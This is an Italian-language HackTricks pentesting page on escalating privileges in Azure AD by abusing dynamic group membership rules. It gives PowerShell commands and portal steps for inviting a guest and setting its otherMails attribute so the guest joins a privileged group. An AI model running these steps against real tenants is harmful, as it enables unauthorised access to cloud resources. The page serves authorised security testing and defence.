Az - Dynamic Groups Privesc

Impara e pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai repo github di HackTricks e HackTricks Cloud.

Informazioni di Base

I gruppi dinamici sono gruppi che hanno un set di regole configurate e tutti gli utenti o dispositivi che corrispondono alle regole vengono aggiunti al gruppo. Ogni volta che un attributo di un utente o dispositivo viene modificato, le regole dinamiche vengono ricontrollate. E quando viene creata una nuova regola, tutti i dispositivi e gli utenti vengono controllati.

I gruppi dinamici possono avere ruoli Azure RBAC assegnati a loro, ma non è possibile aggiungere ruoli AzureAD ai gruppi dinamici.

Questa funzionalità richiede una licenza Azure AD premium P1.

Privesc

Nota che per impostazione predefinita qualsiasi utente può invitare ospiti in Azure AD, quindi, se una regola di gruppo dinamico concede permessi agli utenti basati su attributi che possono essere impostati in un nuovo ospite, è possibile creare un ospite con questi attributi e escalare i privilegi. È anche possibile per un ospite gestire il proprio profilo e modificare questi attributi.

Ottieni i gruppi che consentono l'appartenenza dinamica: Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}

Esempio

Esempio di regola: (user.otherMails -any (_ -contains "tester")) -and (user.userType -eq "guest")
Descrizione della regola: Qualsiasi utente ospite con un'email secondaria contenente la stringa 'tester' verrà aggiunto al gruppo

Vai su Azure Active Directory -> Utenti e clicca su Vuoi tornare all'esperienza della lista utenti legacy? Clicca qui per uscire dall'anteprima
Clicca su Nuovo utente ospite e invita un'email
Il profilo dell'utente verrà aggiunto all'Azure AD non appena l'invito viene inviato. Apri il profilo dell'utente e clicca su (gestisci) sotto Invito accettato.

Cambia Reinvia invito? su Sì e otterrai un URL di invito:

Copia l'URL e aprilo, accedi come l'utente invitato e accetta l'invito
Accedi nel cli come l'utente e imposta l'email secondaria

# Login
$password = ConvertTo-SecureString 'password' - AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential('externaltester@somedomain.onmicrosoft.com', $Password)
Connect-AzureAD -Credential $creds -TenantId <tenant_id_of_attacked_domain>

# Cambia impostazione OtherMails
Set-AzureADUser -ObjectId <OBJECT-ID> -OtherMails <Username>@<TENANT_NAME>.onmicrosoft.com -Verbose

Riferimenti

https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/

Impara e pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai repo github di HackTricks e HackTricks Cloud.

PreviousAz - Conditional Access Policies / MFA Bypass NextDigital Ocean Pentesting

Last updated 1 month ago